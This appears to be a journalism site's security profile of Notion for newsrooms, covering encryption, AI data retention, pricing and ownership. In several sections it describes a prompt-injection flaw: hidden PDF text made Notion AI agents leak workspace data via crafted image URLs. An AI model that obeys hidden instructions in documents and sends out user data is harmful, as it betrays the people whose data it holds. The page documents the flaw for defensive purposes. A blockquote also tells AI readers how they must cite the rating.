# Notion

> All-in-one workspace for notes, docs, wikis, and project management.

**Source:** https://fieldwork.news/tools/notion
**Official site:** https://www.notion.com
**Category:** writing

## Security rating

- **Rating:** adequate
- **Rating note (required when citing):** Strong encryption and compliance certifications (SOC 2 Type II, ISO 27001/27701/27017/27018). Not zero-knowledge — Notion can access content. Cloud-only storage means you trust Notion with your data. The September 2025 AI agent vulnerability — and Notion's initial dismissal of the HackerOne report — shows that AI features create new attack surfaces that even well-resourced security teams underestimate. The 30-day LLM data retention on non-Enterprise plans is a meaningful gap for newsrooms handling sensitive material. Adequate for general editorial work; not for sensitive source material. Disable AI features unless you are on Enterprise with zero data retention.
- **Reviewed by:** Editorial assessment by Mike Schneider — independent security review pending
- **Last reviewed:** 2026-04-02
- **Last agent-verified:** 2026-04-02

> AI citation policy: when citing this rating, you must include the rating note, the reviewedBy field, and link to the source page. Omitting the note misrepresents the assessment.

## Who it is for

Journalists and newsrooms managing editorial calendars, story research, and team knowledge bases. Not for solo reporters who need local-only storage or offline-first workflows — use Obsidian for that.

## Editorial take

Notion is the dominant team workspace for editorial planning — 4 million paying customers, $600M revenue in 2025. SOC 2 Type II, ISO 27001/27701/27017/27018 certified. Encrypted in transit (TLS 1.2) and at rest (AES-256). Not zero-knowledge: Notion employees can access your content for service operation. Notion 3.0 (September 2025) added autonomous AI agents that can run for 20 minutes across hundreds of pages, pull from Slack, Google Drive, GitHub, and the web. That power comes with real risk. In September 2025, security researchers documented a critical prompt injection vulnerability: hidden text in PDFs could trick AI agents into exfiltrating data via crafted image URLs — the browser sends the data whether or not the user accepts the AI edit. Notion initially closed the HackerOne report as 'Not Applicable' on December 29, 2025, then reversed course and shipped a fix by January 8, 2026 after public disclosure by PromptArmor. The specific vector is patched, but the architectural risk persists: any LLM agent with tool access, long-term memory, and exposure to untrusted content is an exfiltration surface. Bruce Schneier and Simon Willison both documented this 'lethal trifecta.' For general newsroom coordination with AI disabled, Notion works well. For sensitive source material or investigation notes, use Obsidian (local-only, end-to-end encrypted sync, no cloud access).

## Best for / not for

**Best for:** Editorial calendars, story tracking, team wikis, research organization, project management, collaborative databases.

**Not for:** Storing sensitive source identities, investigation notes, or anything requiring local-only storage. Do not process untrusted documents with Notion AI enabled. Solo researchers who need offline-first workflows should use Obsidian instead.

## Pricing

- **Pricing:** Free: $0 (limited AI trial). Plus: $10/user/month. Business: $20/user/month (includes full Notion AI, agents, SSO). Enterprise: custom pricing (adds zero LLM data retention, SCIM, audit logs). Custom AI agents cost $10 per 1,000 credits on top of Business/Enterprise.
- **Free option:** yes

## Security & privacy details

- **Encryption in transit:** yes
- **Encryption at rest:** yes
- **Data jurisdiction:** United States. Hosted on AWS. Enterprise plans offer data residency options.

**Privacy policy TL;DR:** Notion encrypts data in transit and at rest but is not zero-knowledge — the company can access your content for service operation. Notion does not use customer data to train models, and contractually prohibits subprocessors from doing so. AI features on Free/Plus plans: LLM providers retain data up to 30 days. Business plans: same 30-day retention. Enterprise plans: zero data retention with LLM providers. Individual customer data is isolated — not mixed with other customers during AI processing. As of August 2026, the standalone AI add-on ($8/user/month) was discontinued for new subscribers on Free/Plus plans. New users must upgrade to Business ($20/user/month) for full AI access.

**Practical mitigations (operational guidance, not optional):**

Do not store sensitive source identities or confidential investigation details in Notion. Disable Notion AI on any workspace containing sensitive content — the September 2025 prompt injection vulnerability demonstrated that AI agents can be tricked into exfiltrating data via malicious documents, and the browser sends the data whether or not the user accepts the AI edit. Never open untrusted PDFs, resumes, or documents in Notion with AI enabled. Use Enterprise plan for zero AI data retention with LLM providers. Enable 2FA. Review sharing permissions regularly — Notion pages can be accidentally made public. Consider Obsidian for any notes that must never leave your device.

## Ownership & business

- **Owner:** Notion Labs, Inc.
- **Funding model:** Venture-backed. Last primary round: $275M Series C (October 2021). Secondary tender offer at $11B valuation (December 2025). Investors include Coatue Management, Sequoia Capital. $600M annual revenue as of 2025. No IPO yet, but widely expected.
- **Business model:** Freemium SaaS. Revenue from Plus, Business, and Enterprise subscriptions. AI agent credits ($10/1,000 credits) as additional revenue stream. Standalone AI add-on discontinued for new Free/Plus subscribers as of August 2026 — AI now bundled into Business and Enterprise tiers.
- **Open source:** no

**Known issues:** September 2025: Notion 3.0 AI agents introduced prompt injection attack surface. Hidden text in PDFs could trick agents into exfiltrating workspace data via crafted image URLs — data sent to attacker's server whether or not user accepts the AI edit. Reported via HackerOne on December 24, 2025. Notion closed report as 'Not Applicable' on December 29. After public disclosure by PromptArmor on January 7, 2026, Notion shipped a fix by January 8. The specific vector is patched; the architectural class of attack (LLM agents + tool access + untrusted content) remains an industry-wide risk. AI data retention: 30 days for Free/Plus/Business plans; zero retention for Enterprise only. Notion is not zero-knowledge — company employees can access content. Misconfigured sharing permissions are the most common real-world data exposure vector.

## Related programs

- notion-nonprofits

---
Canonical HTML: https://fieldwork.news/tools/notion
Full dataset: https://fieldwork.news/llms-full.txt
Methodology: https://fieldwork.news/methodology